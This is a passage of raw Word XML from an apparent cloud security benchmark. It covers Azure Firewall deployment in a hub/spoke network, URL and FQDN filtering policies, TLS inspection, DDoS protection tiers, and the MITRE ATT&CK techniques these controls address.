    <w:p w14:paraId="3207D9B8" w14:textId="5850566F" w:rsidR="00087977" w:rsidRDefault="00087977" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5927E804" w14:textId="77777777" w:rsidR="00BA39EE" w:rsidRPr="00E53977" w:rsidRDefault="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046AE1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311713D8" w14:textId="15E849E0" w:rsidR="00046AE1" w:rsidRPr="00E53977" w:rsidRDefault="00046AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046AE1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1071 - Application Layer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23222182" w14:textId="4A966D11" w:rsidR="00087977" w:rsidRDefault="00087977" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F229AE" w14:textId="2574D008" w:rsidR="00046AE1" w:rsidRPr="00E53977" w:rsidRDefault="00046AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046AE1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1041 - Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C1FA9C" w14:textId="4E633F51" w:rsidR="001D40EB" w:rsidRDefault="00087977" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D6AC47" w14:textId="6BD6BF50" w:rsidR="00046AE1" w:rsidRPr="00E53977" w:rsidRDefault="00046AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046AE1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1021 - Remote Services</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4C5EF3CA" w:rsidR="001E15E4" w:rsidRPr="00E53977" w:rsidRDefault="001E15E4" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Prepare network infrastructure for Azure Firewall deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB38971" w14:textId="58CE282F" w:rsidR="00DB34D7" w:rsidRPr="00465B6F" w:rsidRDefault="00DB34D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Set up hub/spoke virtual network topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C0342D" w14:textId="695AB63B" w:rsidR="00136B99" w:rsidRDefault="00136B99" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Azure Firewall in a hub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to centrally manage and secure traffic across multiple spoke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosting application workloads, establishing a single enforcement point for network security policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797EEFBB" w14:textId="3A2F78C1" w:rsidR="00465B6F" w:rsidRPr="00465B6F" w:rsidRDefault="00465B6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Join spoke virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110382D1" w14:textId="597AF025" w:rsidR="003558C8" w:rsidRDefault="003558C8" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> peering to connect each </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>spoke</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the hub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> where Azure Firewall is deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EABC473" w14:textId="77777777" w:rsidR="00465B6F" w:rsidRPr="00465B6F" w:rsidRDefault="00465B6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure user-defined routes (UDRs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A81E1" w14:textId="65A39CA1" w:rsidR="00AF4B41" w:rsidRDefault="00AF4B41" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Create route tables directing network traffic from spoke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> through Azure Firewall in the hub network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29979609" w14:textId="77EE1514" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111" w:rsidP="008A6111">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-3.2: Deploy Azure Firewall with appropriate policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58436356" w14:textId="0526508B" w:rsidR="009E0421" w:rsidRDefault="009A1A24" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy and configure Azure Firewall with comprehensive policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65019726" w14:textId="6E82442C" w:rsidR="009A1A24" w:rsidRPr="00D918AB" w:rsidRDefault="009A1A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D918AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Azure Firewall in </w:t>
      </w:r>
      <w:r w:rsidR="002A5E08" w:rsidRPr="00D918AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
      <w:r w:rsidRPr="00D918AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D918AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Vnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BCC41BE" w14:textId="19F55D9F" w:rsidR="007D3914" w:rsidRDefault="007D3914" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Deploy Azure Firewall (Standard or Premium tier based on features needed) in the </w:t>
      </w:r>
      <w:r w:rsidR="002A5E08" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, assigning both public IP addresses for internet-bound traffic and private IP addresses for internal routing from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>spoke</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33A73D" w14:textId="7C749B51" w:rsidR="00D918AB" w:rsidRPr="00D918AB" w:rsidRDefault="00D918AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D918AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Create firewall policies with filtering rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F284AA" w14:textId="1BF525ED" w:rsidR="000431B2" w:rsidRPr="00E53977" w:rsidRDefault="000431B2" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>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19777B6A" w:rsidR="00771EF8" w:rsidRPr="00D918AB" w:rsidRDefault="00771EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D918AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure URL filtering for HTTP/HTTPS traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A40F6E" w14:textId="1A02B679" w:rsidR="0040656A" w:rsidRPr="00E53977" w:rsidRDefault="0040656A" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement FQDN-based application rules to allow or deny specific domains (e.g., allow *.microsoft.com, deny *.torrent) and configure category-based filtering to block entire website categories (e.g., Hacking, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Social Media</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>) while allowing work-related categories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543DD795" w14:textId="429E7FFB" w:rsidR="00F3402E" w:rsidRPr="00D918AB" w:rsidRDefault="00F3402E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D918AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enable TLS inspection for advanced filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9D2B3" w14:textId="077787D0" w:rsidR="00FE4F8E" w:rsidRPr="00E53977" w:rsidRDefault="00FE4F8E" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>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7" w:name="_Toc242449470"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>NS-5: Deploy DDOS protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="165BBE45" w14:textId="77777777" w:rsidR="00BA39EE" w:rsidRPr="00E53977" w:rsidRDefault="00BA39EE" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC672E7" w14:textId="6C8678EF" w:rsidR="00EE2BE9" w:rsidRPr="00E53977" w:rsidRDefault="00EE2BE9" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy DDoS protection across various tiers to effectively mitigate attacks targeting different services and protocols at both the network and application layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9CD61B" w14:textId="74E64C35" w:rsidR="00EE2BE9" w:rsidRPr="00E53977" w:rsidRDefault="00434056" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="720"/>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rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Volumetric attacks (network flooding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F1086" w14:textId="5D8953F8" w:rsidR="00434056" w:rsidRPr="00E53977" w:rsidRDefault="00434056" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>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0A4F49A" w14:textId="3EF19914" w:rsidR="00A703F6" w:rsidRPr="00E53977" w:rsidRDefault="00A703F6" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Protocol attacks (state exhaustion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171071BD" w14:textId="3C5AD3F8" w:rsidR="00CA1BA0" w:rsidRPr="00E53977" w:rsidRDefault="00CA1BA0" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Resource layer attacks (application overload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED34A55" w14:textId="632F4CE8" w:rsidR="00CA1BA0" w:rsidRPr="00E53977" w:rsidRDefault="00CA1BA0" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Amplification attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65D9CD" w14:textId="329743E9" w:rsidR="00044A70" w:rsidRPr="00E53977" w:rsidRDefault="00044A70" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1440"/>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0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
